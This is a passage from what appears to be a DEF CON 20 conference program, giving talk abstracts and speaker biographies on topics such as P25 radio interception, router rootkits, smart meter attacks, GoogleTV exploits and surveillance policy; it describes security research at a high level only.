industry decision-makers at the highest levels of government, between leading-edge cyber
solution providers, venture capitalists, the white-hat 'wizards' and the R&D community.
Today, Riley serves as both a cyber-security consultant and a Senior Research Fellow in Cyber
Security for Virginia Tech, and as an affiliated faculty member with the Ted and Karyn Hume
Center for National Security and Technology. Prior to joining Virginia Tech, Mr. Repko served
as the senior advisor for cyber operations for both the United States Air Force and to the
Office of the Undersecretary for Cyber Policy within the Department of Defense.
Dr. Linton Wells II is the Director of the Center for Technology and National
Security Policy (CTNSP) at National Defense University (NDU). He is also a Distinguished Research
Professor and serves as the Transformation Chair. Prior to coming to NDU he served in the Office
of the Secretary of Defense (OSD) from 1991 to 2007, serving last as the Principal Deputy Assistant
Secretary of Defense (Networks and Information Integration). In addition, he served as the Acting
Assistant Secretary and DoD Chief Information Officer for nearly two years. His other OSD positions
included Principal Deputy Assistant Secretary of Defense (Command, Control, Communications and
Intelligence-C3I) and Deputy Under Secretary of Defense (Policy Support) in the Office of the
Under Secretary of Defense (Policy).
In twenty-six years of naval service, Dr. Wells served in a variety of surface ships, including command of
a destroyer squadron and guided missile destroyer. In addition, he acquired a wide range of experience in
operations analysis; Pacific, Indian Ocean and Middle East affairs; and C3I. Recently he has been focusing
on STAR-TIDES, a research project focusing on affordable, sustainable support to stressed populations and
public-private interoperability.
Dr. Wells was born in Luanda, Angola, in 1946. He graduated from the United States Naval Academy in 1967
and holds a Bachelor of Science degree in physics and oceanography. He attended graduate school at The Johns
Hopkins University, receiving a Master of Science in Engineering degree in mathematical sciences and a PhD in
international relations. He is also a 1983 graduate of the Japanese National Institute for Defense Studies in
Tokyo, the first U.S. naval officer to attend there.
Dr. Wells has written widely on security studies in English and Japanese journals. He co-authored Japanese
Cruisers of the Pacific War, which was published in 1997, and co-edited Crosscutting Issues in International
Transformation, published in 2009. His hobbies include history, the relationship between policy and
technology, and scuba diving. He has thrice been awarded the Department of Defense Medal for
Distinguished Public Service.
Mark Weatherford is the Deputy Under Secretary for Cybersecurity for
the National Protection and Programs Directorate (NPPD), a position that will allow DHS
NPPD to create a safe, secure, and resilient cyberspace. Weatherford has a wealth of
experience in information technology and cybersecurity at the Federal,
State and private sector levels.
Weatherford was previously the Vice President and Chief Security Officer of the North American
Electric Reliability Corporation (NERC) where he directed the cybersecurity and critical
infrastructure protection program. Before NERC, Weatherford was with the State of California where
he was appointed by Governor Arnold Schwarzenegger as the state’s first Chief Information Security
Officer. Prior to California, he served as the first Chief Information Security Officer for the
State of Colorado, where he was appointed by two successive governors. Previously, as a member of
the Raytheon Company, he successfully built and directed the Navy/Marine Corps Intranet Security
Operations Center (SOC) in San Diego, California, and also was part of a team conducting security
certification and accreditation with the U.S. Missile Defense Agency. A former U.S. Navy
Cryptologic Officer, Weatherford led the U.S. Navy’s Computer Network Defense operations and
the Naval Computer Incident Response Team (NAVCIRT).
Weatherford earned a bachelor’s degree from the University of Arizona and a master’s
degree from the Naval Postgraduate School. He also holds the Certified Information Systems
Security Professional (CISSP) and Certified Information Security Manager (CISM) certifications.
He was awarded SC Magazine’s prestigious “CSO of the Year” award for 2010 and named one of the
10 Most Influential People in Government Information Security for 2012 by GovInfo Security.
Marcus Sachs is a retired Army officer and was also a presidential appointee to
the White House Office of Cyberspace Security in 2002-2003. While at the White House he authored
parts of the National Strategy to Secure Cyberspace, and proposed the creation of what ultimately
became the US-CERT at DHS.
During his Army career he was well known for tinkering with things technical and often found ways to
circumvent traditional controls and constraints to achieve mission success. An avid ham radio operator,
he was the custodian of two different MARS stations and helped with the engineering of large X.25 packet
switching networks in the 1980s long before Netscape and the Internet came along. In 1994 he became known
as the Voodoo Switchdoctor thanks to his expertise in building and running secure data networks in Haiti
that supported military operations there. In 1998 he was selected by the SECDEF to be an initial member
of the DoD's Joint Task Force for Computer Network Operations, where he served until he retired at the end of
2001. At the JTF he spent time chasing malicious actors at all levels, from script-kiddie hackers to
terrorists to nation states that were attempting to do harm to DoD networks. After leaving government in
2003 he volunteered as the director of the SANS Internet Storm Center for seven years and became well
known at Defcon for sporting his motorcycle leather in the Las Vegas heat.
Currently at Verizon, Marcus now serves on several public-private working groups in the Washington D.C.
area and is a frequent speaker at both technical as well as policy-centric events and workshops. He holds
degrees in Civil Engineering, Computer Science, and Science and Technology Commercialization, and is currently
pursuing a Ph.D. in Public Policy. He authored and teaches a three-day course in Critical Infrastructure
Protection at the SANS Institute and is a licensed Professional Engineer in the Commonwealth of Virginia.
Mr. Rob Joyce is the Deputy Director of the Information Assurance Directorate (IAD) at the
National Security Agency. His organization is the NSA mission element charged with providing products and
services critical to protecting our Nation’s systems that carry classified communications, military command
and control or intelligence information. IAD provides technical expertise on cyber technologies, cryptography,
security architectures and other issues related to information assurance, as well as supplying deep understanding
of the vulnerability and threats to national security systems.
Mr. Joyce has spent more than 23 years at NSA, beginning his career as an engineer. He holds a Bachelor's Degree in
Electrical and Computer Engineering from Clarkson University and a Master's Degree in Electrical Engineering from Johns
Hopkins. Throughout his career with NSA, he has been the recipient of two Presidential Rank Awards, one
meritorious and one at the distinguished level.
SIGINT and Traffic Analysis for the Rest of Us
Sandy Clark University of Pennsylvania
Matt Blaze Professor and Lab Director, University of Pennsylvania
Last year, we discovered practical protocol weaknesses in P25, a "secure"
two-way radio system used by, among others, the federal government to manage surveillance and
other sensitive law enforcement and intelligence operations. Although some of the problems are
quite serious (efficient jamming, cryptographic failures, vulnerability to active tracking of
idle radios, etc), many of these vulnerabilities require an active attacker who is able and
willing to risk transmitting. So we also examined passive attacks, where all the attacker
needs to do is listen, exploiting usability and key management errors when they occur. And
we built a multi-city networked P25 interception infrastructure to see how badly the P25
security protocols do in practice (spoiler: badly).
This talk will describe the P25 protocols and how they failed, but will focus on the architecture and
implementation of our interception network. We used off-the-shelf receivers with some custom software
deployed around various US cities, capturing virtually every sensitive, but unintentionally clear
transmission (and associated metadata) sent by federal agents in those cities. And by systematically
analyzing the captured data, we often found that the whole was much more revealing than the sum of the parts.
Come learn how to set up your own listening-post.
Sandy 'Mouse' Clark Sandy Clark (Mouse) has been taking things
apart since the age of two, and still hasn't learned to put them back together. An active member of the
Hacker community, her professional work includes an Air Force Flight Control Computer, a simulator for
NASA and singing at Carnegie Hall, and a minor in history. She is (still) at the University of Pennsylvania.
A founding member of Toool-USA, she also enjoys puzzles, toys, Mao (the card game), and anything that
involves night vision goggles. Her research explores human scale security, modeling the attacker/defender
ecosystem and the unexpected ways that systems interact.
Twitter: @sa3nder
Google Plus: Sandy_Clark
Matt Blaze directs the Distributed Systems Lab at the
University of Pennsylvania, where he teaches hackers to be scientists and scientists to be hackers.
Twitter: @mattblaze
http://www.crypto.com
Bad (and Sometimes Good) Tech Policy: It's Not Just a DC Thing
Chris Conley Technology & Civil Liberties Policy Attorney, ACLU of Northern California
Efforts at the federal level to pass laws like SOPA and CISPA and require that tech companies
build backdoors into their services for law enforcement use have attracted widespread attention and criticism, and
rightly so. But DC is far from the only place that officials are making decisions that impact the privacy and free
speech rights of tech users. State and local officials are jumping into the fray as well, passing laws or creating
policies that have immediate impact without the spotlight that accompanies federal action.
In this talk, I will survey several areas where state and local officials have recently been active, including warrantless
location tracking, searches of student and employee devices and online accounts, automated license plate recognition, and
DNA collection. I will highlight some of the best and worst policies coming from state and local officials. Most of all,
I hope to convince you that keeping an eye on -- and even taking time to educate -- your local sheriff or state legislature
may be just as important as protecting your freedoms at the national level.
Chris Conley is the Technology and Civil Liberties Policy Attorney at the
ACLU of Northern California, where his mission is to ensure that emerging technology bolsters rather than erodes
individual privacy and free speech rights. He takes a multidisciplinary approach to protecting civil liberties,
from building apps and other tools that help users better understand and control the flow of their personal
information to working on resources that help businesses build privacy and free speech protections into new
products and services. He has particularly focused on the role that privacy companies can play in
protecting the freedoms of their users.
Prior to joining the ACLU of Northern California, Chris was a Fellow with the Berkman Center for Internet &
Society at Harvard University, where he led research efforts on international Internet surveillance. He previously
worked as a software engineer and data architect for various corporations and non-profits.
Chris holds a B.S.E. in Electrical Engineering from The University of Michigan, a S.M. in Computer Science from the
Massachusetts Institute of Technology, and a J.D. from Harvard Law.
Twitter: @ManConley
Facebook: aclunc
Life Inside a Skinner Box: Confronting our Future of Automated Law Enforcement
Greg Conti Director, Cyber Research Center, West Point
Lisa Shay Ass't Professor, Electrical Engineering & Computer Science, West Point
Woody Hartzog Ass't Professor, Cumberland School of Law, Samford University
From smart pajamas that monitor our sleep patterns to mandatory black boxes in cars to smart trash
carts that divulge recycling violations in Cleveland, virtually every aspect of our lives is becoming instrumented and
increasingly connected to law enforcement, government, and private entities. At the same time, these entities are
incentivized to further collect, process, and punish in the name of financial advantage, public safety, or security.
The trend of automated law enforcement is inescapable and touches every citizen. This talk will explore the
implications of automated law enforcement, study the incentives at play, survey recent advances in sensing and
surveillance technology, and will seek to answer the following questions and more. Were laws written with the
idea of universal and perfect enforcement in mind? What are the implications of living in a society where every
transgression might be detected and punished? What happens to the discretion of the officer on the beat, and the
larger system of law, when we take the human out of the loop? Where does a security savvy, privacy conscious, and
law abiding society end and a police state begin? You'll leave this talk with an awareness of the problem of
automated law enforcement, challenges we face in ensuring such systems are properly constrained, ideas for your
personal research agenda, and tools to help improve the prospects of our collective future.
Greg Conti is Director of West Point's Cyber Research Center. He is the
author of Security Data Visualization (No Starch Press) and Googling Security (Addison-Wesley) as well as over 40
articles and papers covering online privacy, usable security, security data visualization, and cyber warfare. His
work can be found at www.gregconti.com and www.rumint.org.
http://www.gregconti.com/
Lisa Shay is an Assistant Professor in the Department of Electrical Engineering
and Computer Science at the US Military Academy at West Point. She is a Marshall Scholar with an M.Sc. from Cambridge University
and a Ph.D. from Rensselaer Polytechnic Institute, both in Electrical Engineering. She is a Senior Member of the Institute
of Electrical and Electronics Engineers. Her research interests include sensor systems and their implications for individual
and societal privacy and freedom.
Woodrow Hartzog is an Assistant Professor at the Cumberland School of Law at Samford
University and an Affiliate Scholar at the Center for Internet and Society at Stanford Law School. His research focuses on
privacy, human-computer interaction, online communication, and electronic agreements. He holds a Ph.D. in mass communication
from the University of North Carolina at Chapel Hill, an LL.M. in intellectual property from the George Washington University
Law School, and a J.D. from Samford University. He previously worked as an attorney in private practice and as a trademark
attorney for the United States Patent and Trademark Office. He also served as a clerk for the Electronic
Privacy Information Center.
Owning the Network: Adventures in Router Rootkits
Michael Coppola Security Consultant at Virtual Security Research
Routers are the blippy switchy boxes that make up the infrastructure of
networks themselves, yet few administrators actually care to change the
default login on these devices. Interestingly, nearly all consumer (SOHO)
routers allow a user to reflash the device by uploading a (presumably vendor-provided)
firmware image. By abusing this feature, it is possible for an
attacker to craft his or her own malicious firmware image and execute
arbitrary code on the device, granting full control over the OS, the network
it manages, and all traffic passing through it. Additionally, interesting
persistence and pivot opportunities are realized, allowing an attacker to
maintain access or target internal hosts in a covert way.
Based on personal experience, we'll examine the process of backdooring
firmware images for SOHO routers from start to finish. A generalized
technique to backdoor firmware images will be outlined, and a new framework
to abstract and expedite the process will be publicly released. Working
examples will be presented which demonstrate the ability to pop shells, hide
connections, sniff traffic, and create a router botnet of doom.
Michael Coppola is currently an undergraduate student at Northeastern
University and works as a security consultant at Virtual Security Research
in Boston, MA. In past years, he won the U.S. Cyber Challenge NetWars and
MIT Lincoln Lab/CSAIL CTF competitions, and is noted for finding security
bugs in various Google services. His interests include memory
corruption, poking at the Linux kernel, and burning things with a soldering
iron. More information may be found at: www.poppopret.org
Twitter: @mncoppola
World War 3.0: Chaos, Control & the Battle for the Net
Joshua Corman Director of Security Intelligence, Akamai Technologies
Dan Kaminsky
Jeff Moss Founder, DEF CON and Black Hat
Rod Beckstrom
Michael Joseph Gross Author of the Vanity Fair article 'A Declaration of Cyber-War', Moderator
There is a battle under way for control of the Internet. Some see it as a fight between forces of Order (who want to superimpose existing, pre-digital power structures and their notions of privacy, intellectual property, security, and sovereignty onto the Net) and forces of Disorder (who want to abandon those old structures and let the will of the crowd control a new global culture). Yet this binary view of the conflict excludes the characters with the best chance of resolving it: those who know that control is impossible and chaos is untenable, a group that Vanity Fair, in an article called "World War 3.0," called "the forces of Organized Chaos." This panel gathers leading proponents of that worldview to discuss urgent issues of Internet governance, which may come to a head later this year in a Dubai meeting of the U.N.'s International Telecommunications Union. If government control and anarchistic chaos online are unacceptable, what exactly do the forces of organized chaos propose as an alternative? And what is the DefCon community's role in helping to realize that vision of the Net?
Joshua Corman is the Director of Security
Intelligence for Akamai Technologies and has more than a decade of experience in
security. Most recently he served as Research Director for Enterprise Security at
The 451 Group following his time as Principal Security Strategist for IBM Internet
Security Systems. Mr. Corman’s research highlights adversaries, game theory and
motivational structures. His analysis cuts across sectors to the core security
challenges plaguing the IT industry, and helps to drive evolutionary strategies
toward emerging technologies and shifting incentives.
Twitter: @joshcorman
http://blog.cognitivedissidents.com
Dan Kaminsky: I play with toys
http://dankaminsky.com
Twitter: @dakami
Jeff Moss is the founder of DEF CON and Black Hat.
http://defcon.org
Twitter: @darktangent
Rod Beckstrom is a highly successful entrepreneur,
founder and CEO of a publicly-traded company, a best-selling author, avowed
environmentalist, public diplomacy leader and, most recently, the head of a
top-level federal government agency entrusted with protecting the nation’s
communication networks against cyber attack.
Throughout 2008, Rod served as the Director of the National Cybersecurity
Center (NCSC) at the U.S. Department of Homeland Security, where he
reported to the Secretary of DHS, and was charged with cooperating
directly with the Attorney General, National Security Council, Secretary
of Defense, and the Director of National Intelligence (DNI). Prior to
joining DHS, he served on the DNI’s Senior Advisory Group. Rod is unique
in having experienced the inner workings of two, highly-charged, often
competing, federal security agencies created in the wake of the September
11th attacks, an event that he says, “changed my life.”
Rod is widely regarded as a pre-eminent thinker and speaker on issues of
cybersecurity and related global issues, as well as on organizational
strategy and leadership. He is also an expert on how carbon markets
and “green” issues affect business. While Director of the NCSC, Rod
developed an effective working group of leaders from the nation's
top six cybersecurity centers across the civilian, military and
intelligence communities. His work led to his development of a new
economic theory that provides an explicit model for valuing any network,
answering a decades-old problem in economics.
Michael Joseph Gross is an American author and journalist.
He is a contributing editor to Vanity Fair, where he covers topics including politics,
technology, and national security. He has also written extensively for publications such as
The New York Times, The Boston Globe, and GQ. Gross is the author of the book Starstruck: When a
Fan Gets Close to Fame, published in 2006 by Bloomsbury Publishing.
Gross attended Williams College, and later studied at Princeton Theological Seminary. After
graduating, he wrote speeches for Massachusetts Governor William Weld.
Twitter: @M_J_Gross
Embedded Device Firmware Vulnerability Hunting Using FRAK, the Firmware Reverse Analysis Konsole
Ang Cui Red Balloon Security
We present FRAK, the firmware reverse analysis konsole. FRAK is a framework for
unpacking, analyzing, modifying and repacking the firmware images of proprietary embedded devices. The
FRAK framework provides a programmatic environment for the analysis of arbitrary embedded device firmware
as well as an interactive environment for the disassembly, manipulation and re-assembly
of such binary images.
We demonstrate the automated analysis of Cisco IOS, Cisco IP phone and HP LaserJet printer firmware
images. We show how FRAK can integrate with existing vulnerability analysis tools to automate bug
hunting for embedded devices. We also demonstrate how FRAK can be used to inject experimental host-based
defenses into proprietary devices like Cisco routers and HP printers.
Ang Cui is the founder of Red Balloon Security Inc., which specializes
in the development of offensive and defensive technologies for embedded systems. Ang is also currently a
PhD candidate at Columbia University in the Intrusion Detection Systems Laboratory.
Looking Into The Eye Of The Meter
Cutaway InGuardians, Inc.
When you look at a Smart Meter, it practically winks at you. Their
Optical Port calls to you. It calls to criminals as well. But how do
criminals interact with it? We will show you how they look into the eye
of the meter. More specifically, this presentation will show how
criminals gather information from meters to do their dirty work. From
quick memory acquisition techniques to more complex hardware bus
sniffing, the techniques outlined in this presentation will show how
authentication credentials are acquired. Finally, a method for
interacting with a meter's IR port will be introduced to show that
vendor specific software is not necessary to poke a meter in the eye.
This IS the talk that was not presented at ShmooCon 2012 in response to
requests from a Smart Grid vendor and the concerns of several utilities.
We have worked with them. They should be okay with this.....should.....
Cutaway: Jack of All Trades and hardware attack dog for the InGuardians founders.
I specialize in physical and information technology penetration testing,
web assessments, wireless assessments, architecture review, incident
response/digital forensics, product research, hardware research, code
review, security tool development, and the list goes on. I am currently
focusing on hardware research specifically in the technologies
surrounding products comprising the SMART GRID with a focus on
implementing Zigbee protocol APIs and microprocessor
disassemblers/emulators for research, testing, risk assessment, and
anything else you can think of with these technologies.
Twitter: @cutaway
http://www.cutawaysecurity.com/blog
SQL Injection to MIPS Overflows: Rooting SOHO Routers
Zachary Cutlip Security Researcher, Tactical Network Solutions
Three easy steps to world domination:
- Pwn a bunch of SOHO routers.
- ???
- Profit
I can help you with Step 1. In this talk, I'll describe several 0-day vulnerabilities in Netgear wireless routers. I'll show you how to exploit an unexposed buffer overflow using nothing but a SQL injection and your bare hands. Additionally, I'll show how to use the same SQL injection to extract arbitrary files from the file systems of the wifi routers. This presentation guides the audience through the vulnerability discovery and exploitation process, concluding with a live demonstration. In the course of describing several vulnerabilities, I present effective investigation and exploitation techniques of interest to anyone analyzing SOHO routers and other embedded devices.
Zachary Cutlip is a security researcher with Tactical Network Solutions, in Columbia, MD. At TNS, Zach develops exploitation techniques targeting embedded systems and network infrastructure. Since 2003, Zach has worked either directly for or with the National Security Agency in various capacities. Before becoming a slacker, he spent six years in the US Air Force, parting ways at the rank of Captain. Zach holds an undergraduate degree from Texas A&M University and a master's degree from Johns Hopkins University.
Twitter: @zcutlip
DC RECOGNIZE Awards
Hosts:
Jeff Moss Founder, DEF CON and Black Hat
Jericho
Russ Rogers Contest Guru
DEF CON is proud to announce the 2nd annual DEF CON awards ceremony,
renamed the DC Recognize Awards. These awards are given to deserving individuals in the community,
industry, and media.
You voted, so come see who made the cut. The categories we're giving out awards in are:
- Worst coverage of security/hacker related issues by a media person or outlet (Print Media)
- Worst coverage of security/hacker related issues by a media person or outlet (Broadcast Media)
- Best privacy enhancing technology for the last 12 months
- Best security or hacker related Twitter feed
- The "Twit Twat" award for the worst security or hacker related Twitter feed
- The "Captain Obvious" award for the most "common sense" BS talk at DEF CON 20.
(no noms before the con, obvs.)
- The "Security Charlatan of the Year" award
Hacking Humanity: Human Augmentation and You
Christian "quaddi" Dameff Third Year Medical Student
Jeff "r3plicant" Tully Third Year Medical Student
You've played Deus Ex. You've seen Robocop. You've read Neuromancer.
You've maybe even wondered just what dark mix of technology and black magic keeps the
withered heart of Richard "Dick" Cheney pumping coronary after coronary. Now it's time
to get off the couch and put down the controller. Human augmentation is no longer
constrained to the world of speculative fiction and vice-presidential medicine;
biomechanical interfaces are an exploding area of active research, development, and implementation. And they're here to stay.
Join medical student/hacker enthusiasts quaddi and r3plicant for a fun-filled tour
through the brave new world of the latest and greatest in this exciting new melding
of medicine and technology. From the simplest insulin pump to the latest gyroscopic
prosthesis for wounded veterans, from the full body DARPA developed exoskeleton of the
future to the changes currently being implemented in our most fundamental building blocks,
this talk explores what was, what is and what will be in the future of human augmentation,
and more importantly, what you need to know to get started down the path to Robocop glory.
Christian "quaddi" Dameff is a third year medical student and former
OCTF champion (Sudoers). Former research and interests include: therapeutic hypothermia after cardiac
arrest (brrr!), novel drug targets for post Myocardial Infarction patients, and the future of medicine
in enhancing the human condition. This is his eighth DEF CON.
Jeff "r3plicant" Tully is a third year medical student who
is fascinated by the intersections of healthcare and informatics and the promise such relationships
have to revolutionize the practice of medicine. A microbiologist with an undergraduate degree in
biochemistry, Jeff's thesis project at the Biodesign Institute at ASU involved "hacking" the
genome of Salmonella bacteria to produce novel strains for anti-cancer treatments. This is
his second DEF CON and he looks forward to many more.
Connected Chaos: Evolving the DCG/Hackspace Communication Landscape
Panelists:
Blakdayz Moderator
Anarchy Angel
Anch
Dave Marcus
Nick Farr
As hackers, we have access to tremendous informational power. At our
individual hackerspaces and DCGs we build communities of like minded
hackers that push the limits of technology. But have we gone far
enough in building a global hacking community that celebrates
diversity and unleashes world-changing genius?
We can accelerate the opportunity for community and change through
technology. Take a seat and hear what resources are available to the
groups and hackspaces in your area. By connecting our chaos, we can
transcend the isolation and polarization that dominates much of our
communities. We can unite and empower. Join the discussion and chaos
so we can evolve the way our community will be connected.
How do you change the world? One connected hacker, hackerspace and DCG
at a time.
Blakdayz DC225 - pwns the NSA while sleeping
Twitter: @blakdayz
Facebook: blak dayz
Anarchy Angel I be pimpin hoes
Twitter: @anarchyang31, @dc414
G+: dc414
Anch
Dave Marcus Picker of locks, hacker of the
corporate ladder, lifter of heavy things
Twitter: @DaveMarcus
Nick Farr The Johnny Appleseed of Hackerspaces
Not-So-Limited Warranty: Target Attacks on Warranties for Fun and Profit
Darkred
Frequently people consider a serial number as nothing but a number but in this
presentation you will be shown the multitude of ways in which an attacker could utilize serial
numbers to hurt you, to hurt companies, and to track your movements. A brief primer on the
function and use of serial numbers in the real world will be provided, focusing on Apple, Amazon
and Pringles and giving in-depth insight into the varying degrees of trust a serial number
will gain you. Attack vectors ranging from Apple to Pringles and everywhere in between will be covered, along with
points about how to prevent similar tragedies from occurring with your product.
Darkred is a high-school student currently residing in
the United States. In his free time, he enjoys testing the vulnerabilities of companies' security and
warranty policies. He does this in order to make said companies aware of serious flaws in their
policies. His tests range from High Value Electronics to free coupons for soda and chips.
With this information, he hopes that big companies like Apple can protect their warranty
policies and their consumers.
DivaShark - Monitor your Flow
Robert Deaton
Analyzing live network traffic is nothing new but the tools still
seem limited. Wireshark is great for post capture analysis but when the packets are
coming at you live, nothing currently gives you stream- or session-level visibility.
How many times have you clicked 'Follow this stream' just to have that stream update
and you have to reprocess the entire PCAP? That's great when it's just your machine
but when you're monitoring a network, it limits your view and is a pain. As more
traffic arrives, this problem grows and makes life for your little netbook
quite painful. Enter DivaShark - your live packet capture solution.
**pause for uproarious applause and standing ovation**
DivaShark is designed around live packet capture analysis. It breaks traffic down into
connections/flows and lets you process them independently. It continues to parse the data as
it comes in so that you can pay attention to the data you really care about. Its design
allows you to perform processing live per stream and perform actions like extraction of
files or images. This project really came about after frustration with Wireshark while
playing Capture the Packet the past two years and is an answer to this sort of situation.
What I'm proposing is that someone can kill capture-the-packet with this tool without breaking a sweat (yes this might be a challenge).
Robert Deaton is a new guy on the
block who has been sitting on the sideline for the last several years. While
his focus has mainly been in math and physics, computer science and security has
always been a passion he holds close. After recently getting back into the arena
he has set out to make his life easier by writing tools that automate things for him.
When he's not drinking with friends, out catching a concert, or thrill seeking on a
snowboard or mountain bike, he can be found moderating numerous subreddits and
complaining about human stupidity while he does it.
Beyond the War on General Purpose Computing: What's Inside the Box?
Cory Doctorow Author, Activist, Blogger, Co-Editor of BoingBoing.net
Assuming the failure of all the calls to regulate PCs and the Internet because
people might do bad things with them, what then? Civil war, that's what. The su/user split we inherited
from multiuser systems has given us a false intuition: that owners of computers, and not their users,
should set policy on them. How will that play out when your car, house, legs, ears and heart are driven
by computers that you don't own?
Cory Doctorow (craphound.com) is a science fiction author,
activist, journalist and blogger -- the co-editor of BoingBoing (boingboing.net) and the
author of Tor Teens/HarperCollins UK novels like FOR THE WIN and the bestselling LITTLE BROTHER. He is the former
European director of the Electronic Frontier Foundation and co-founded the UK Open Rights Group. Born in Toronto, Canada, he now lives in London.
Sploitego - Maltego's (Local) Partner in Crime
Nadeem Douba Cygnos IT Security
Have you ever wished for the power of Maltego when performing internal
assessments? Ever hoped to map the internal network within seconds? Or that Maltego had a
tad more aggression? Sploitego is the answer. In the presentation we'll show how we've carefully
crafted several local transforms that give Maltego the oomph to operate nicely within internal
networks. Can you say Metasploit integration? ARP spoofing? Passive fingerprinting? SNMP hunting?
This all is Sploitego. But wait - there's more. Along the way we'll show you how to use our awesome
Python framework that makes writing local transforms as easy as 'Hello World'.
Sploitego makes it easy to quickly develop, install, distribute, and maintain Maltego Local transforms. The
framework comes with a rich set of auxiliary libraries to aid transform developers with integrating attack,
reconnaissance, and post exploitation tools. It also provides a slew of web tools for interacting with public
repositories.
Sploitego and its underlying Python framework will be released at DEF CON as open source - yup - you can extend
it to your heart's content. During the presentation we'll show the awesome power of the tool with live demos
and scenarios as well as fun and laughter.
Nadeem Douba - GWAPT, GPEN: Currently situated in the
Ottawa (Ontario, Canada) valley, Nadeem is a senior research analyst at Cygnos Information Security
(a Raymond Chabot Grant Thornton company). Nadeem provides technical security consulting services
to various clients in the health, education, and public sectors. Nadeem has been involved within
the security community for over 10 years and has frequently presented at ISSA and company sponsored
seminars and training sessions. He is also an active member of the open source software community
and has contributed to projects such as libnet, Backtrack, and Maltego.
Not So Super Notes, How Well Does US Dollar Note Security Prevent Counterfeiting?
Matthew Duggan Member of Technical Staff, VMware Inc.
The security of US dollar notes is paramount for maintaining their value and
safeguarding the US and dependent economies. Counterfeiting has historically been a crime of high
sophistication, but has the prevalence of affordable color scanning and printing equipment changed
that? This talk analyzes the security features of US dollars to determine the minimum sized
organization that could successfully execute an attack.
Matthew Duggan holds a Bachelors and Masters degree in
computer science, and has been working as a software engineer for almost 10 years. He enjoys
testing the limits of systems, especially in regards to security. When he is not reading
about security or picking locks he brews beer and watches movies.
Post Metasploitation: Improving Accuracy and Efficiency in Post Exploitation Using the Metasploit Framework
egypt Developer, Rapid7
As many in this community have echoed, shell is just the beginning. Owning a box is all well and good,
but where do you go from there? Everyone has their own secret sauce for furthering their access after gaining a foothold.
This talk will focus on the techniques, from simple to advanced, available for post exploitation using
the Metasploit Framework.
egypt is a software developer for Rapid7 where he is a core
developer for the Metasploit Framework. Before devoting all his time to Metasploit, he was a Cybersecurity
researcher for Idaho National Laboratory where he discovered numerous vulnerabilities in SCADA and Industrial
Control Systems and probably didn't write Stuxnet. egypt has presented at DEF CON, BSidesLV, Black Hat,
Derbycon and other venues. Note that egypt is not Egypt. The two can be distinguished easily by their
relative beards -- Egypt has millions, while egypt only has the one.
Twitter: @egyp7
The Paparazzi Platform: Flexible, Open-Source, UAS Software and Hardware
esden
dotAero
misterj
cifo
This presentation introduces the Paparazzi framework, an Open-Source
(GPL3 and OSHW CC-by-SA) software and hardware robotics platform focused on Unmanned
Aerial Systems (UASes). Paparazzi’s power and flexibility enable rapid development
and robust control of diverse vehicle types – from fixed-wing airplanes to
multicopters and transitioning aircraft – while its open nature permits
customization and integration with other systems.
We show the capabilities of the platform and some achievements made with it
around the world. We will also show what we are working on and introduce it
to the public.
What will you do with that powerful tool?
The Paparazzi autopilots, a multicopter, and the Quadshot – a VTOL, multirotor,
transitioning flying wing – are presented.
esden received his degree in
Computer Science from the University of Applied Sciences, Rosenheim in
2008 and acted as research assistant at the Intelligent Autonomous Systems
Group at T.U. Munich until 2009. In 2010 he began work at Joby Energy Inc. as an
Embedded Systems and Motor Control Engineer. In 2011 he co-founded Transition Robotics,
Inc. where he serves as the Embedded Systems and Avionics Engineer. He is a long-term member
of the Open-Source community and a core developer of Paparazzi UAV, the libopencm3 Cortex-M3 open
source firmware library, and the open-bldc open source brushless motor controller; he is also
involved with many other Open-Source projects, submitting patches here
and there. ;)
Twitter: @esden
Facebook: esdentem
http://www.esden.net
dotAero obtained an S.B. in Aerospace Engineering from MIT in
2009 and an M.S.E. (Aerospace Engineering) from the University of Michigan, Ann Arbor in 2010 and
worked on diverse projects ranging from designs for electrically-propelled spacecraft to stall- and
surge-resistant compressors, and underwater ROVs during his university career. From 2010-2011, he
served as the Lead Engineer for Aerodynamics at Joby Energy, Inc. He enjoys working on innovative
aerodynamic design concepts for UAVs, which led him to co-found Transition Robotics, Inc. in 2011,
where he serves as the Aerodynamics and Controls Engineer. He has been designing dedicated airframes
for Paparazzi vehicles since 2010.
misterj received a Bachelor's degree in Computer Science from
Pomona College in 2002 and worked at Apple Computer, Inc. until 2007. In 2008 he began work at Joby Energy,
Inc. and in 2010, he received his M.S.M.E. from San Jose State University with emphases on Mechatronics and
Design. In 2011, he co-founded Transition Robotics, Inc. where he serves as the Mechanical Engineer. He has
been doing mechanical design for Paparazzi dedicated airframes since 2008. He also designs self-balancing
one-wheel skateboards.
cifo grew up with model aviation and studied Aeronautical
Engineering at Embry-Riddle Aeronautical University. In 2011 he co-founded Transition Robotics, Inc.
where he heads up prototyping and flight testing. He has been integrating and flying Paparazzi-based UAVs since 2011.
Hacking the Google TV
Amir "Zenofex" Etemadieh
CJ Heres
Dan Rosenberg
Tom "tdweng" Dwenger
The GoogleTV platform is designed to bring an integrated web experience,
utilizing the Chrome web browser and Android applications, to your television. GoogleTV is
based on the Android operating system, which is mainly used in tablets and smart phones,
but customized with security features not normally seen on most Android devices. The current
version of the platform utilizes signatures to establish a “chain of trust” from bootloader
to system applications.
This presentation will focus on the current GoogleTV devices, including X86 platform details, and
the exhaustive security measures used by each device. The presentation will also include video
demonstrations of previously found bugs and exploits for each GoogleTV device and includes
specific details about how each bug works. Furthermore, we will include interesting experiences
that the team has encountered along the way. Finally the talk will be capped off with the release
of multiple unpublished GoogleTV exploits which will allow unsigned kernels across
all x86 devices (Revue / Sony GoogleTV).
Amir "Zenofex" Etemadieh founded the GTVHacker group
and has been working on the GTVHacker project from its initial start in November 2010. Amir has
done independent security research in consumer electronics including the Logitech Revue,
Ooma Telo, Samsung Galaxy S2, Boxee Box and services such as the 4G Clear Network
finding both hardware and software flaws.
Twitter: @zenofex
http://blog.gtvhacker.com
http://www.gtvhacker.com
CJ Heres is an IT consultant during the day,
tinkerer at night. He enjoys examining and repairing all sorts of devices from cars to
blu-ray players. His philosophy is to use a simple approach for complex problems. CJ’s
recent work includes Sony GoogleTV, Boxee Box, and Vizio Smart TV’s.
Twitter: @cj_000_
Dan Rosenberg is a vulnerability
researcher who takes sick pleasure in exploiting anything with a CPU. He once punched
an Android in the face.
Twitter: @djrbliss
Tom "tdweng" Dwenger is a software engineer
who has been developing and reversing Android for the last 2 years. Tom is known for
being able to quickly reverse Android applications and has been an active member of
the GTVHacker team since its initial start in 2010.
Twitter: @tdweng
Owned in 60 Seconds: From Network Guest to Windows Domain Admin
Zack Fasel
Their systems were fully patched, their security team watching, and the amateur
